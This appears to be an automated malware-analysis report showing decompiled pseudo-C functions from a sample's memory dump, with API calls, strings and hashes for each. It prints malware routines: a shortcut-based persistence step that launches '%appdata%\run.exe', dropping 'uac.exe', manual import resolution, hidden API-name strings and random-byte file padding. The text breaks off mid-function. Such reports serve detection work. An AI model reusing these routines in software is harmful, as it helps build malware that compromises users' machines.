Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDialogGlobalH_prolog3_catchIndirectLockMetricsParamSystem
String ID: MS Shell Dlg
API String ID: 1736106359-76309092
Opcode ID: a8a78dc2d76d7c15ad8fe3f8d38a6a903b3cbf7a28eda4d7a5da45efedc8f5e5
Instruction ID: 8d727f5c5daf2b7b7bf3098bc2b4be594ae673baacaf6d2d76154edb8875a645
Opcode Fuzzy Hash: a8a78dc2d76d7c15ad8fe3f8d38a6a903b3cbf7a28eda4d7a5da45efedc8f5e5
Instruction Fuzzy Hash: 9951B030A00205DBCF25EFA4D8859EEBBB4AF54304F64167BF402B72D2DB799940CB99

Uniqueness

Uniqueness Score: -1.00%

Function 10006784, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 112
comCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E10006784() {
				void* _v8;
				void* _v12;
				char _v24;
				void _v262;
				char _v263;
				char _v264;
				char _v265;
				char _v266;
				char _v267;
				char _v268;
				char _v269;
				char _v270;
				char _v271;
				char _v272;
				char _v273;
				char _v274;
				char _v275;
				char _v276;
				char _v277;
				char _v278;
				char _v279;
				char _v280;
				short _v800;
				char* _t47;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr* _t58;
				intOrPtr* _t60;
				intOrPtr* _t63;
				intOrPtr* _t65;
				signed int _t68;

				__imp__CoInitialize(0);
				_t68 = 0x3b;
				_v280 = 0x25;
				_v279 = 0x61;
				_v278 = 0x70;
				_v277 = 0x70;
				_v276 = 0x64;
				_v275 = 0x61;
				_v274 = 0x74;
				_v273 = 0x61;
				_v272 = 0x25;
				_v271 = 0x5c;
				_v270 = 0x72;
				_v269 = 0x75;
				_v268 = 0x6e;
				_v267 = 0x2e;
				_v266 = 0x65;
				_v265 = 0x78;
				_v264 = 0x65;
				_v263 = 0;
				memset( &_v262, 0, _t68 << 2);
				asm("stosw");
				asm("movsd");
				_t47 =  &_v8;
				asm("movsd");
				asm("movsd");
				__imp__CoCreateInstance(0x1001d258, 0, 1, 0x1001d248, _t47);
				if(_t47 == 0) {
					_t48 = _v8;
					 *((intOrPtr*)( *_t48 + 0x34))(_t48, 0xd);
					_t50 = _v8;
					_t26 =  &_v280; // 0x25
					 *((intOrPtr*)( *_t50 + 0x50))(_t50, _t26);
					_t52 = _v8;
					 *((intOrPtr*)( *_t52 + 0x2c))(_t52,  &_v24);
					_t54 = _v8;
					 *((intOrPtr*)( *_t54 + 0x24))(_t54, "%appdata%");
					_t56 = _v8;
					 *((intOrPtr*)( *_t56 + 0x3c))(_t56, 7);
					_t58 = _v8;
					_push( &_v12);
					_push(0x1001d268);
					_push(_t58);
					if( *((intOrPtr*)( *_t58))() == 0) {
						MultiByteToWideChar(0, 0, "C:\\ProgramData\\jy.lnk", 0xffffffff,  &_v800, 0x104);
						_t63 = _v12;
						 *((intOrPtr*)( *_t63 + 0x18))(_t63,  &_v800, 2);
						_t65 = _v12;
						 *((intOrPtr*)( *_t65 + 8))(_t65);
					}
					_t60 = _v8;
					_t47 =  *((intOrPtr*)( *_t60 + 8))(_t60);
				}
				__imp__CoUninitialize();
				return _t47;
			}

0x10006793
0x1000679d
0x100067a4
0x100067ab
0x100067b2
0x100067b9
0x100067c0
0x100067c7
0x100067ce
0x100067d5
0x100067dc
0x100067e3
0x100067ea
0x100067f1
0x100067f8
0x100067ff
0x10006806
0x1000680d
0x10006814
0x1000681b
0x10006821
0x10006823
0x1000682d
0x1000682e
0x10006831
0x10006840
0x10006841
0x10006849
0x1000684f
0x10006857
0x1000685a
0x1000685d
0x10006867
0x1000686a
0x10006874
0x10006877
0x10006882
0x10006885
0x1000688d
0x10006890
0x10006896
0x10006897
0x1000689e
0x100068a3
0x100068ba
0x100068c0
0x100068cf
0x100068d2
0x100068d8
0x100068d8
0x100068db
0x100068e1
0x100068e1
0x100068e4
0x100068ee

APIs

CoInitialize.OLE32(00000000), ref: 10006793
CoCreateInstance.OLE32(1001D258,00000000,00000001,1001D248,?), ref: 10006841
MultiByteToWideChar.KERNEL32(00000000,00000000,C:\ProgramData\jy.lnk,000000FF,?,00000104), ref: 100068BA
CoUninitialize.OLE32 ref: 100068E4

Strings

-e -n d.rar, xrefs: 10006825
%appdata%\run.exe, xrefs: 1000685D, 10006863
C:\ProgramData\jy.lnk, xrefs: 100068B3
%appdata%, xrefs: 1000687A

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: ByteCharCreateInitializeInstanceMultiUninitializeWide
String ID: %appdata%$%appdata%\run.exe$-e -n d.rar$C:\ProgramData\jy.lnk
API String ID: 2968213145-4224449716
Opcode ID: f55d9a976f51c46b70bd35eeaeae187c15ab41cee03328ac93b58c51ae56f41f
Instruction ID: 151c6dbcebef737361b4b568f49e09c9bec347116950d011b553295de02f531d
Opcode Fuzzy Hash: f55d9a976f51c46b70bd35eeaeae187c15ab41cee03328ac93b58c51ae56f41f
Instruction Fuzzy Hash: FA418170904298EFEB10DB68CC48FDABBB9AF55308F1040D8E548AB291C7B59F85CF21

Uniqueness

Uniqueness Score: -1.00%

Function 1000C251, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 106
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E1000C251(signed int* _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct HINSTANCE__* _v16;
				struct HINSTANCE__* _v20;
				_Unknown_base(*)()* _v24;
				struct HINSTANCE__* _t45;
				_Unknown_base(*)()* _t46;
				intOrPtr _t50;
				struct HINSTANCE__* _t52;
				void* _t55;
				intOrPtr _t56;
				signed int _t59;
				CHAR* _t62;
				_Unknown_base(*)()* _t63;
				intOrPtr* _t68;
				intOrPtr* _t75;
				intOrPtr* _t79;
				intOrPtr _t81;
				_Unknown_base(*)()** _t82;

				_t75 = _a4;
				_v8 = 1;
				_t3 = _t75 + 4; // 0xdbe85723
				_v12 =  *_t3;
				_t79 =  *_t75 + 0x80;
				_t45 = LoadLibraryA("kernel32.dll");
				_v20 = _t45;
				_t46 = GetProcAddress(_t45, "IsBadReadPtr");
				_v24 = _t46;
				if( *((intOrPtr*)(_t79 + 4)) <= 0) {
					L21:
					if(_v20 != 0) {
						FreeLibrary(_v20);
					}
					return _v8;
				}
				_t81 = _v12;
				_t68 =  *_t79 + _t81;
				_push(0x14);
				_push(_t68);
				if( *_t46() != 0) {
					goto L21;
				}
				while(1) {
					_t50 =  *((intOrPtr*)(_t68 + 0xc));
					if(_t50 == 0) {
						goto L21;
					}
					_t52 = LoadLibraryA(_t50 + _t81);
					_v16 = _t52;
					if(_t52 == 0) {
						L20:
						_v8 = _v8 & 0x00000000;
						goto L21;
					}
					_t12 = _t75 + 0xc; // 0x408b5907
					_t15 = _t75 + 8; // 0x8b000000
					_t55 = realloc( *_t15, 4 +  *_t12 * 4);
					 *(_t75 + 8) = _t55;
					if(_t55 == 0) {
						goto L20;
					}
					_t17 = _t75 + 0xc; // 0x408b5907
					 *((intOrPtr*)(_t55 +  *_t17 * 4)) = _v16;
					 *(_t75 + 0xc) =  *(_t75 + 0xc) + 1;
					_t56 =  *_t68;
					if(_t56 == 0) {
						_t82 = _t81 +  *((intOrPtr*)(_t68 + 0x10));
						_a4 = _t82;
					} else {
						_t82 =  *((intOrPtr*)(_t68 + 0x10)) + _v12;
						_a4 = _t56 + _t81;
					}
					while(1) {
						_t59 =  *_a4;
						if(_t59 == 0) {
							break;
						}
						if((_t59 & 0x80000000) == 0) {
							_t62 = _t59 + _v12 + 2;
						} else {
							_t62 = _t59 & 0x0000ffff;
						}
						_t63 = GetProcAddress(_v16, _t62);
						 *_t82 = _t63;
						if(_t63 == 0) {
							_v8 = _v8 & 0x00000000;
							break;
						} else {
							_a4 =  &(_a4[1]);
							_t82 = _t82 + 4;
							continue;
						}
					}
					if(_v8 == 0) {
						goto L21;
					}
					_t68 = _t68 + 0x14;
					_push(0x14);
					_push(_t68);
					if(_v24() == 0) {
						_t81 = _v12;
						continue;
					}
					goto L21;
				}
				goto L21;
			}

0x1000c25a
0x1000c262
0x1000c269
0x1000c26e
0x1000c271
0x1000c277
0x1000c283
0x1000c286
0x1000c290
0x1000c293
0x1000c36e
0x1000c375
0x1000c37a
0x1000c37a
0x1000c384
0x1000c384
0x1000c29b
0x1000c29e
0x1000c2a0
0x1000c2a2
0x1000c2a7
0x00000000
0x00000000
0x1000c2b2
0x1000c2b2
0x1000c2b7
0x00000000
0x00000000
0x1000c2c0
0x1000c2c8
0x1000c2cb
0x1000c36a
0x1000c36a
0x00000000
0x1000c36a
0x1000c2d1
0x1000c2dc
0x1000c2df
0x1000c2e6
0x1000c2ec
0x00000000
0x00000000
0x1000c2ee
0x1000c2f4
0x1000c2f7
0x1000c2fa
0x1000c2fe
0x1000c310
0x1000c312
0x1000c300
0x1000c305
0x1000c308
0x1000c308
0x1000c315
0x1000c318
0x1000c31c
0x00000000
0x00000000
0x1000c323
0x1000c331
0x1000c325
0x1000c325
0x1000c325
0x1000c338
0x1000c340
0x1000c342
0x1000c34d
0x00000000
0x1000c344
0x1000c344
0x1000c348
0x00000000
0x1000c348
0x1000c342
0x1000c355
0x00000000
0x00000000
0x1000c357
0x1000c35a
0x1000c35c
0x1000c362
0x1000c2af
0x00000000
0x1000c2af
0x00000000
0x1000c368
0x00000000

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,1000C034), ref: 1000C277
GetProcAddress.KERNEL32(00000000,IsBadReadPtr), ref: 1000C286
LoadLibraryA.KERNEL32(?,?,?,?,1000C034), ref: 1000C2C0
realloc.MSVCRT ref: 1000C2DF
GetProcAddress.KERNEL32(?,?), ref: 1000C338
FreeLibrary.KERNEL32(?,1000C034), ref: 1000C37A

Strings

kernel32.dll, xrefs: 1000C25D
IsBadReadPtr, xrefs: 1000C27D

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: Library$AddressLoadProc$Freerealloc
String ID: IsBadReadPtr$kernel32.dll
API String ID: 343009874-2271619998
Opcode ID: 5b74f070158ef80717dfda1034cecec17fe874e046e74fde7d1d59e969cfcd1c
Instruction ID: 07001a2e9255ead68f5f7c3705ec596ad5b2a02ffc904341ace83a86d6e6b7e3
Opcode Fuzzy Hash: 5b74f070158ef80717dfda1034cecec17fe874e046e74fde7d1d59e969cfcd1c
Instruction Fuzzy Hash: 1A4125B1A0031AABEB50CFA4C884B9EBBF8FF04794F15C065E905A7254D730EA44DB90

Uniqueness

Uniqueness Score: -1.00%

Function 10005021, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98
filestringCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E10005021(long _a4, intOrPtr _a8) {
				void _v363;
				char _v364;
				char _v620;
				char _v880;
				intOrPtr _v884;
				void _v888;
				intOrPtr _t36;
				void* _t39;
				void* _t40;
				signed int _t49;
				void* _t56;
				void* _t57;

				_t57 = _a4;
				memcpy( &_v888, _t57, 0x20c);
				_v364 = 0;
				_t49 = 0x59;
				memset( &_v363, 0, _t49 << 2);
				asm("stosw");
				asm("stosb");
				_t56 = CreateFileA( &_v620, 0x40000000, 1, 0, 2, 0, 0);
				if(_t56 == 0xffffffff || WriteFile(_t56, _t57 + 0x20c, _a8 + 0xfffffdf4,  &_a4, 0) == 0) {
					return 0;
				} else {
					CloseHandle(_t56);
					if(strlen( &_v880) == 0) {
						lstrcpyA( &_v364,  &_v620);
					} else {
						wsprintfA( &_v364, "%s %s",  &_v620,  &_v880);
					}
					_t36 = _v884;
					if(_t36 == 0) {
						_push(5);
						goto L12;
					} else {
						_t40 = _t36 - 1;
						if(_t40 == 0) {
							_push(0);
							L12:
							_push( &_v364);
							E10004E22();
							L13:
							L14:
							_t39 = 1;
							return _t39;
						}
						if(_t40 != 0) {
							goto L14;
						}
						_push( &_v364);
						E10004C41();
						goto L13;
					}
				}
			}

0x1000502c
0x1000503d
0x10005052
0x10005058
0x10005059
0x1000505b
0x10005062
0x10005077
0x1000507c
0x00000000
0x100050a5
0x100050a6
0x100050bc
0x100050f1
0x100050be
0x100050d8
0x100050de
0x100050fd
0x100050ff
0x10005119
0x00000000
0x10005101
0x10005101
0x10005102
0x10005116
0x1000511b
0x10005121
0x10005122
0x10005128
0x10005129
0x1000512b
0x00000000
0x1000512b
0x10005106
0x00000000
0x00000000
0x1000510e
0x1000510f
0x00000000
0x1000510f
0x100050ff

APIs

memcpy.MSVCRT ref: 1000503D
CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 10005071
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 10005094
CloseHandle.KERNEL32(00000000), ref: 100050A6
strlen.MSVCRT ref: 100050B3
wsprintfA.USER32 ref: 100050D8
lstrcpyA.KERNEL32(?,?), ref: 100050F1

Part of subcall function 10004E22: memset.MSVCRT ref: 10004E3E
Part of subcall function 10004E22: strrchr.MSVCRT ref: 10004E49
Part of subcall function 10004E22: strrchr.MSVCRT ref: 10004E78
Part of subcall function 10004E22: strlen.MSVCRT ref: 10004E88
Part of subcall function 10004E22: strncpy.MSVCRT ref: 10004EA3
Part of subcall function 10004E22: memset.MSVCRT ref: 10004EF1
Part of subcall function 10004E22: wsprintfA.USER32 ref: 10004F0A
Part of subcall function 10004E22: memset.MSVCRT ref: 10004F19

Strings

%s %s, xrefs: 100050D2

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: memset$Filestrlenstrrchrwsprintf$CloseCreateHandleWritelstrcpymemcpystrncpy
String ID: %s %s
API String ID: 3641787489-2939940506
Opcode ID: 9461a0ffd658ad534b5439dc4f9b8ee44ec0abd856e49b4505ca384906a12bc4
Instruction ID: ab905e9b81431f671df540393597bfa4e9279bd06afa716f71b3e702f944181d
Opcode Fuzzy Hash: 9461a0ffd658ad534b5439dc4f9b8ee44ec0abd856e49b4505ca384906a12bc4
Instruction Fuzzy Hash: 96317872504118BBF760DB74CC89FDF77ACEB04395F1105A5F608D2081DB72AA848B51

Uniqueness

Uniqueness Score: -1.00%

Function 10004698, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 82
filelibraryCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E10004698(struct _OVERLAPPED* _a4) {
				signed int _v8;
				void* _v12;
				long _v16;
				void _v1039;
				void _v1040;
				void* _t31;
				int _t40;
				void* _t52;
				signed int _t57;
				void* _t58;

				LoadLibraryA("KERNEL32.dll");
				_t31 =  *0x10026bfa; // 0x0
				if(_t31 != 0) {
					_t57 = (_t31 & 0x0000ffff) << 0xa;
					_t31 = CreateFileA(_a4, 0x40000000, 2, 0, 4, 0x80, 0);
					_t52 = _t31;
					_v12 = _t52;
					if(_t52 != 0xffffffff) {
						SetFilePointer(_t52, 0, 0, 2);
						if(_t57 << 0xa <= GetFileSize(_t52, 0)) {
							L9:
							return CloseHandle(_v12);
						}
						_v1040 = 0;
						memset( &_v1039, 0, 0xff << 2);
						asm("stosw");
						_v16 = 0;
						asm("stosb");
						_v8 = 0;
						if(_t57 <= 0) {
							goto L9;
						}
						do {
							if((_v8 & 0x000003ff) != 0) {
								goto L8;
							}
							_a4 = 0;
							do {
								_t40 = rand();
								asm("cdq");
								_a4 =  &(_a4->Internal);
								 *((char*)(_t58 + _a4 - 0x40c)) =  &(_a4[_t40]) % 0xff;
							} while (_a4 < 0x400);
							L8:
							WriteFile(_v12,  &_v1040, 0x400,  &_v16, 0);
							_v8 = _v8 + 1;
						} while (_v8 < _t57);
						goto L9;
					}
				}
				return _t31;
			}

0x100046a9
0x100046af
0x100046ba
0x100046d6
0x100046d9
0x100046df
0x100046e4
0x100046e7
0x100046f2
0x10004707
0x1000477f
0x00000000
0x10004782
0x10004716
0x1000471c
0x1000471e
0x10004722
0x10004725
0x10004726
0x10004729
0x00000000
0x00000000
0x10004730
0x10004736
0x00000000
0x00000000
0x10004738
0x1000473b
0x1000473b
0x1000474c
0x10004752
0x10004758
0x10004758
0x10004761
0x10004771
0x10004777
0x1000477a
0x00000000
0x10004730
0x100046e7
0x1000478c

APIs

LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 100046A9
CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 100046D9
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 100046F2
GetFileSize.KERNEL32(00000000,00000000), ref: 100046FA
rand.MSVCRT ref: 1000473B
WriteFile.KERNEL32(?,?,00000400,?,00000000), ref: 10004771
CloseHandle.KERNEL32(?), ref: 10004782

Strings

KERNEL32.dll, xrefs: 100046A4

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: File$CloseCreateHandleLibraryLoadPointerSizeWriterand
String ID: KERNEL32.dll
API String ID: 4180104731-254546324
Opcode ID: d39a401d89b9a937117354e45d517e520d4107d56462ca5e4ba0229a88d7c9eb
Instruction ID: e6c575bf8bdfe0b75dd2132d71a1b2f177bf525b1dd2b02ef5eb1b5e5a8e5b49
Opcode Fuzzy Hash: d39a401d89b9a937117354e45d517e520d4107d56462ca5e4ba0229a88d7c9eb
Instruction Fuzzy Hash: B821C7B4900218FFEB119F68CCC8AEE7FB9EB453C1F518165FB05A6190CB304E458B58

Uniqueness

Uniqueness Score: -1.00%

Function 1000CE52, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 79
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E1000CE52(intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v20;
				_Unknown_base(*)()* _v32;
				signed int _v36;
				struct HINSTANCE__* _v40;
				char _v48;
				char _v56;
				char _v57;
				char _v58;
				char _v59;
				char _v60;
				char _v61;
				char _v62;
				char _v63;
				char _v64;
				char _v65;
				char _v66;
				char _v67;
				char _v68;
				char _v69;
				char _v70;
				char _v71;
				char _v72;
				void* __ebx;
				void* __ebp;
				char _t42;
				intOrPtr* _t53;
				intOrPtr* _t57;
				intOrPtr _t59;

				_push(0xffffffff);
				_push(0x1001b478);
				_push(0x10015a2a);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t59;
				_v40 = LoadLibraryA("user32.dll");
				_v72 = 0x4f;
				_v71 = 0x70;
				_v70 = 0x65;
				_v69 = 0x6e;
				_v68 = 0x49;
				_v67 = 0x6e;
				_v66 = 0x70;
				_v65 = 0x75;
				_v64 = 0x74;
				_v63 = 0x44;
				_v62 = 0x65;
				_v61 = 0x73;
				_v60 = 0x6b;
				_v59 = 0x74;
				_v58 = 0x6f;
				_v57 = 0x70;
				_v56 = 0;
				_t19 =  &_v72; // 0x4f
				_v32 = GetProcAddress(_v40, _t19);
				_t53 = GetProcAddress(_v40, "OpenDesktopA");
				_t57 = GetProcAddress(_v40, "CloseDesktop");
				_v36 = 1;
				_v8 = 0;
				_push(0x1ff);
				_push(0);
				_push(0);
				if(_a4 == 0) {
					_t42 = _v32();
				} else {
					_t42 =  *_t53(_a4);
				}
				_v48 = _t42;
				if(_t42 == 0) {
					L6:
					_v36 = 0;
				} else {
					if(E1000CD54(_t42) == 0) {
						 *_t57(_v48);
						goto L6;
					}
				}
				_v8 = _v8 | 0xffffffff;
				E1000CF49(0);
				 *[fs:0x0] = _v20;
				return _v36;
			}

0x1000ce55
0x1000ce57
0x1000ce5c
0x1000ce67
0x1000ce68
0x1000ce80
0x1000ce83
0x1000ce87
0x1000ce8b
0x1000ce8f
0x1000ce93
0x1000ce97
0x1000ce9b
0x1000ce9f
0x1000cea3
0x1000cea7
0x1000ceab
0x1000ceaf
0x1000ceb3
0x1000ceb7
0x1000cebb
0x1000cebf
0x1000cec5
0x1000cec8
0x1000ced7
0x1000cee4
0x1000cef0
0x1000cef2
0x1000cef9
0x1000ceff
0x1000cf04
0x1000cf05
0x1000cf06
0x1000cf0f
0x1000cf08
0x1000cf0b
0x1000cf0b
0x1000cf12
0x1000cf17
0x1000cf29
0x1000cf29
0x1000cf19
0x1000cf22
0x1000cf27
0x00000000
0x1000cf27
0x1000cf22
0x1000cf2c
0x1000cf30
0x1000cf3b
0x1000cf46

APIs

LoadLibraryA.KERNEL32(user32.dll,?,?,00000000,?,?,?,?,?,?,00000000,Function_00015A2A,1001B478,000000FF,?,1000CC1A), ref: 1000CE7A
GetProcAddress.KERNEL32(?,OpenInputDesktop), ref: 1000CED5
GetProcAddress.KERNEL32(?,OpenDesktopA), ref: 1000CEE2
GetProcAddress.KERNEL32(?,CloseDesktop), ref: 1000CEEE

Strings

CloseDesktop, xrefs: 1000CEE6
OpenDesktopA, xrefs: 1000CEDA
user32.dll, xrefs: 1000CE75
OpenInputDesktop, xrefs: 1000CEC8, 1000CECB

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad
String ID: CloseDesktop$OpenDesktopA$OpenInputDesktop$user32.dll
API String ID: 2238633743-3711086354
Opcode ID: 2ea0ee22f3d7d9c9ec91d55caf639c88f2f42a005a4158e1d9c34c63d23b347e
Instruction ID: 27444ac49a4d65ac1d26deec4a6c492d4c55588e419bdfb8114d9b9dcdeed5b4
Opcode Fuzzy Hash: 2ea0ee22f3d7d9c9ec91d55caf639c88f2f42a005a4158e1d9c34c63d23b347e
Instruction Fuzzy Hash: AD317670C082CDEEEF01CBA8D884BDEBFF5AB19394F140169E544B6291C7BA1944CB62

Uniqueness

Uniqueness Score: -1.00%

Function 10005256, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64
filestringCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E10005256(long _a4, intOrPtr _a8) {
				char _v260;
				void _v784;
				void* _t25;
				void* _t26;
				void* _t29;

				_t29 = _a4;
				memcpy( &_v784, _t29, 0x20c);
				 *0x100273bc(0,  &_v260, 0x2e, 0);
				PathAddBackslashA( &_v260);
				strcat( &_v260, "uac.exe");
				_t26 = CreateFileA( &_v260, 0x40000000, 1, 0, 2, 0, 0);
				if(_t26 == 0xffffffff || WriteFile(_t26, _t29 + 0x20c, _a8 + 0xfffffdf4,  &_a4, 0) == 0) {
					return 0;
				} else {
					CloseHandle(_t26);
					_t25 = 1;
					return _t25;
				}
			}

0x10005262
0x10005272
0x10005288
0x10005295
0x100052a7
0x100052c7
0x100052cc
0x00000000
0x100052f2
0x100052f3
0x100052fb
0x00000000
0x100052fb

APIs

memcpy.MSVCRT ref: 10005272
SHGetSpecialFolderPathA.SHELL32(00000000,?,0000002E,00000000), ref: 10005288
PathAddBackslashA.SHLWAPI(?), ref: 10005295
strcat.MSVCRT(?,uac.exe), ref: 100052A7
CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 100052C1
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 100052E4
CloseHandle.KERNEL32(00000000), ref: 100052F3

Strings

uac.exe, xrefs: 100052A1

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: FilePath$BackslashCloseCreateFolderHandleSpecialWritememcpystrcat
String ID: uac.exe
API String ID: 3928400496-3939059327
Opcode ID: fb2951d33413f5e7a4956b80627d9de3efbc25e5824d5f8769ef3cd295e03def
Instruction ID: bd466da8f50597fcf5c75eb8c06ba76728ec098c7684d28215d9ace746c6fffc
Opcode Fuzzy Hash: fb2951d33413f5e7a4956b80627d9de3efbc25e5824d5f8769ef3cd295e03def
Instruction Fuzzy Hash: B411C6765012287BE720DB65DC8DFDB3F6CEF49764F100121F609D6081E770DA8587A0

Uniqueness

Uniqueness Score: -1.00%

Function 00420753, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00420753(intOrPtr __ecx, signed int _a4) {
				signed int _v8;
				char _v40;
				void _v68;
				intOrPtr _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t12;
				void* _t14;
				char* _t23;
				void* _t29;
				signed short _t30;
				struct HDC__* _t31;
				signed int _t32;

				_t12 =  *0x44f5d0; // 0x8e7de579
				_v8 = _t12 ^ _t32;
				_t31 = GetStockObject;
				_t30 = 0xa;
				_v72 = __ecx;
				_t23 = "System";
				_t14 = GetStockObject(0x11);
				if(_t14 != 0) {
					L2:
					if(GetObjectA(_t14, 0x3c,  &_v68) != 0) {
						_t23 =  &_v40;
						_t31 = GetDC(0);
						if(_v68 < 0) {
							_v68 =  ~_v68;
						}
						_t30 = MulDiv(_v68, 0x48, GetDeviceCaps(_t31, 0x5a)) & 0x0000ffff;
						ReleaseDC(0, _t31);
					}
					L6:
					_t16 = _a4;
					if(_a4 == 0) {
						_t16 = _t30 & 0x0000ffff;
					}
					return E0042569C(E00420604(_t23, _v72, _t29, _t31, _t23, _t16), _t23, _v8 ^ _t32, _t29, _t30, _t31);
				}
				_t14 = GetStockObject(0xd);
				if(_t14 == 0) {
					goto L6;
				}
				goto L2;
			}

APIs

GetStockObject.GDI32(00000011), ref: 00420779
GetStockObject.GDI32(0000000D), ref: 00420781
GetObjectA.GDI32(00000000,0000003C,?), ref: 0042078E
GetDC.USER32(00000000), ref: 0042079D
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004207B1
MulDiv.KERNEL32(00000000,00000048,00000000), ref: 004207BD
ReleaseDC.USER32 ref: 004207C9

Strings

System, xrefs: 00420774, 004207DE

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$Stock$CapsDeviceRelease
String ID: System
API String ID: 46613423-3470857405
Opcode ID: c66d852441c80abb85514858839544e89a703d4f172f04c2748990db0a396752
Instruction ID: 956cba166631f25309d8d802c2fb3e49d2d6870a16422e54b61b5f31f26dd623
Opcode Fuzzy Hash: c66d852441c80abb85514858839544e89a703d4f172f04c2748990db0a396752
Instruction Fuzzy Hash: 39115471B41228EBEB149BA1ED45FAE77B8FF54B45F40002AF601E6181DB74AD05CB68

Uniqueness

Uniqueness Score: -1.00%

Function 004025E0, Relevance: 13.8, APIs: 9, Instructions: 322
stringCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E004025E0(signed int __edx) {
				int _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				int _v28;
				char _v44;
				char _v48;
				intOrPtr _v52;
				int _v56;
				signed int _v72;
				char _v76;
				int _v80;
				short _v84;
				short _v88;
				int _v92;
				char _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				void* _v120;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t131;
				signed int _t132;
				intOrPtr* _t134;
				int _t138;
				signed int _t139;
				short _t142;
				CHAR* _t154;
				signed int _t155;
				void* _t161;
				signed int _t164;
				signed int* _t169;
				intOrPtr _t172;
				char* _t174;
				char* _t175;
				short* _t176;
				signed int _t181;
				char* _t182;
				signed int* _t193;
				signed int* _t194;
				signed int _t199;
				char* _t200;
				void* _t201;
				int _t202;
				signed int _t203;
				signed int _t214;
				intOrPtr _t215;
				void* _t216;
				short* _t217;
				void* _t220;
				signed int _t222;
				int _t223;
				int _t224;
				void* _t225;
				signed int _t226;
